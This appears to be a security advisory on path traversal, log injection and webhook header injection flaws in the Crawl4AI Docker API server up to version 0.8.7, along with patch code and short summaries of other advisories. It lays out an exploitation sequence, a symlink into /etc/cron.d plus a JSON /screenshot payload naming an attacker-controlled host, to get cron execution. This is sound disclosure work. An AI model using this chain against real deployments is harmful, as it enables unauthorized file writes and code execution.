Jun 16, 2026·6 min read·5 visits
Crawl4AI <= 0.8.7 suffers from path traversal via symlink resolution bypasses, leading to arbitrary file write and potential RCE. It also lacks validation for log streams and webhook headers, allowing log manipulation and request smuggling. Version 0.8.8 addresses these issues.
An in-depth technical analysis of multiple security vulnerabilities in the self-hosted Docker API server of Crawl4AI up to version 0.8.7. These flaws include a critical arbitrary file write via symlink traversal and TOCTOU weakness, CRLF log injection, webhook header injection, and SSRF filter gaps. These have been remediated in version 0.8.8.
The self-hosted Docker API server deployment of Crawl4AI (crawl4ai) provides high-performance web crawling capabilities designed to ingest web pages for Large Language Model (LLM) and Retrieval-Augmented Generation (RAG) ingestion pipelines.\n\nTo allow users to retrieve rendered visual assets, the API endpoints /screenshot and /pdf accept an optional parameter named output_path. This parameter determines where generated output files are saved on the filesystem of the container.\n\nIn Crawl4AI version 0.8.7 and earlier, the path containment checks and request parameter validations were insufficient to protect the host filesystem. This technical report details a primary Arbitrary File Write vulnerability via symlink-following and Time-of-Check to Time-of-Use (TOCTOU) weaknesses, alongside concurrent CRLF Log Injection, Webhook Request-Header Injection, and Server-Side Request Forgery (SSRF) bypasses.
The primary vulnerability stems from an insecure validation implementation within the validate_output_path() function in deploy/docker/utils.py. The function was designed to prevent path traversal (CWE-22) by checking whether the target path resolved within the ALLOWED_OUTPUT_DIR. However, in version 0.8.7, this validation only performed a literal string-based comparison using Python's startswith() method.\n\nBecause the function did not resolve underlying symbolic links (symlinks) using os.path.realpath, it permitted path components that pointed to symlinks. An attacker who could create or reference a symlink inside the ALLOWED_OUTPUT_DIR (pointing to an external directory like /etc/cron.d or /usr/local/bin) could bypass containment. The string representation of the target path (e.g., outputs/symlink_dir/malicious_file) started with the allowed prefix, but the subsequent write operation would follow the symlink, writing the output directly to the external target.\n\nFurthermore, the file creation process was vulnerable to a Time-of-Check to Time-of-Use (TOCTOU) race condition. Because files were opened using standard open(..., 'wb') modes without defensive flags like O_NOFOLLOW, the filesystem would unquestioningly resolve symlinks at the moment of file output, even if the destination was checked right before. Concurrently, the Webhook component was vulnerable to CRLF Injection (CWE-93/CWE-113) because arbitrary custom headers from the request body were forwarded to outgoing HTTP requests without character sanitization.
To understand the exact changes made to remediate these flaws, consider the diff of deploy/docker/utils.py. The vulnerable containment check in version 0.8.7 was strictly string-based:\n\npython\n# Vulnerable implementation in 0.8.7\nif not abs_path.startswith(abs_allowed):\n raise HTTPException(...)\n\n\nThis code failed to resolve symbolic links. In the patched version 0.8.8, the validation was hardened to resolve the physical path recursively using os.path.realpath() on the parent directory before verifying containment:\n\npython\n# Hardened implementation in 0.8.8\nreal_parent = os.path.realpath(os.path.dirname(abs_path))\nreal_path = os.path.join(real_parent, os.path.basename(abs_path))\nstring_ok = abs_path.startswith(abs_allowed)\nreal_ok = (real_path + os.sep).startswith(abs_allowed)\nif not (string_ok and real_ok):\n raise HTTPException(status_code=400, detail="output_path must resolve within allowed dir")\n\n\nTo address the TOCTOU symlink following vulnerability, a new writing function, write_output_file(), was introduced. This function leverages file descriptor flags including os.O_NOFOLLOW to actively block symlink resolution at the final target component:\n\npython\ndef write_output_file(abs_path: str, data: bytes) -> None:\n os.makedirs(os.path.dirname(abs_path), exist_ok=True)\n flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)\n fd = os.open(abs_path, flags, 0o600)\n with os.fdopen(fd, "wb") as f:\n f.write(data)\n\n\nAdditionally, the log injection vulnerability (CWE-117) was remediated by registering a CRLFSafeFilter that strips carriage returns, newlines, and non-tab control characters from all logged records. Webhook security was hardened by adding a strict regular expression validator sanitize_webhook_headers() that blocks restricted headers (such as Host or Cookie) and prevents CRLF sequences in header names or values.
Exploitation of the Arbitrary File Write vulnerability requires a multi-step sequence to achieve remote code execution in a Docker environment. The following Mermaid diagram demonstrates the logic bypass of the path validation filter:\n\nmermaid\ngraph LR\n A["POST /screenshot request"] --> B["Extract output_path parameter"]\n B --> C["validate_output_path() validation"]\n C --> D{"Is string prefix matching?"}\n D -- Yes --> E["Passes 0.8.7 startswith() check"]\n E --> F["Write file payload"]\n F --> G["Target OS resolves symlink"]\n G --> H["File written to /etc/cron.d (RCE)"]\n\n\nTo execute this attack, the adversary must have a mechanism to create a symbolic link inside the directory defined by ALLOWED_OUTPUT_DIR. In scenarios where a shared volume or a secondary write vector is present, the attacker creates a symbolic link outputs/link pointing directly to a highly critical system directory such as /etc/cron.d or /etc/logrotate.d.\n\nOnce the symlink is placed, the attacker triggers an unauthenticated POST request to /screenshot with the payload:\n\njson\n{\n "url": "http://attacker-controlled-site.com/malicious_payload",\n "output_path": "link/cron_job"\n}\n\n\nThe API server verifies outputs/link/cron_job against the string pattern. Since it begins with the correct prefix, the check succeeds. The system then takes the screenshot output (or PDF document) and writes it to the target file. Since link resolves to /etc/cron.d, the file is written to /etc/cron.d/cron_job. The host or container's cron daemon subsequently parses the script, executing the injected commands as the root user.
The cumulative impact of the vulnerabilities disclosed under GHSA-7CX2-G3H9-382P is high. Under the primary Arbitrary File Write flaw, an unauthenticated attacker can achieve arbitrary file write access across any writable partition of the container filesystem. When combined with typical Docker configurations where container services execute as privileged users, this vulnerability can lead directly to remote code execution (RCE) on the container.\n\nThe concurrent Webhook Header Injection vulnerability allows attackers to perform HTTP Request Smuggling, override critical headers like Host or Authorization, and route internal requests to external attacker-controlled infrastructure. This exposes internal API keys and system authorization tokens. Additionally, the CRLF Log Injection flaw allows attackers to compromise log integrity by writing arbitrary fake logs, which could obfuscate malicious activity or crash automated Security Information and Event Management (SIEM) systems.
To remediate all security issues covered under GHSA-7CX2-G3H9-382P, administrators and developers must immediately upgrade Crawl4AI deployments to version 0.8.8 or later. If utilizing the PyPI package directly, execute the following command:\n\nbash\npip install -U crawl4ai>=0.8.8\n\n\nIf using the official Docker container, pull the latest image containing the patch:\n\nbash\ndocker pull unclecode/crawl4ai:0.8.8\n\n\nAs a temporary workaround or hardening measure, ensure that the API container runs with a read-only root filesystem. This prevents write operations outside designated volume mounts, neutralizing the path traversal RCE vector. Furthermore, enable API authentication using the CRAWL4AI_API_TOKEN environment variable to ensure all administrative endpoints require valid authentication before processing requests.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
crawl4ai unclecode | <= 0.8.7 | 0.8.8 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-59 (Link Following), CWE-22 (Path Traversal) |
| Attack Vector | Network (AV:N) |
| CVSS v3.1 Score | 8.1 (High) |
| EPSS Score | N/A (GitHub Security Advisory) |
| Impact | Arbitrary File Write / Remote Code Execution |
| Exploit Status | poc |
| KEV Status | Not Listed |
The application does not properly resolve symbolic links before opening files, allowing arbitrary file writes outside the restricted container outputs directory.
An authenticated security-bypass vulnerability in n8n allows users with workflow creation or modification privileges to bypass the Python AST security validator. By circumventing AST validation logic, attackers can execute arbitrary statements, access the task executor's root module namespace, and disclose sensitive host environment variables on self-hosted instances.
An incorrect authorization vulnerability in the Public API of n8n allows authenticated users with read-only permissions to bypass access control boundaries. By invoking the execution retry endpoint, an unauthorized user can trigger workflow executions, effectively escalating their privileges from workflow:read to workflow:execute.
A low-severity Cross-Site Scripting (XSS) vulnerability in Nuxt's globally registered <NoScript> head component allows unauthenticated attackers to execute arbitrary JavaScript. By injecting dynamic, untrusted data into <NoScript> slots, standard Vue HTML escaping is bypassed because the component processes slot text nodes and assigns them directly to the target element's innerHTML property instead of textContent. In modern browsers with scripting enabled, this raw injection can implicitly close the <noscript> tag, triggering script execution.
CVE-2026-49993 identifies an incomplete same-origin check validation mechanism in @nuxt/webpack-builder and @nuxt/rspack-builder dev server middleware. When the local development server is bound to a non-loopback address, cross-origin attackers can bypass verification checks by suppressing browser headers, leading to unauthorized retrieval and exfiltration of compiled source code chunks.
An OS command injection vulnerability in yt-dlp before 2026.06.09 allows unauthenticated remote attackers to execute arbitrary shell commands via crafted media metadata when a user processes media using the --exec post-processing parameter with unsafe string interpolation conversions.
A technical evaluation of the Crawl4AI open-source web crawling and scraping library revealed a high-severity credential exfiltration vulnerability in its self-hosted Dockerized API server. The flaw arises from an unvalidated base_url parameter in request payloads and a dynamic prefix resolution mechanism that retrieves system environment variables. Unauthenticated remote attackers can leverage these features in tandem to extract host-level secrets or redirect configured LLM API keys to an external listener under their control.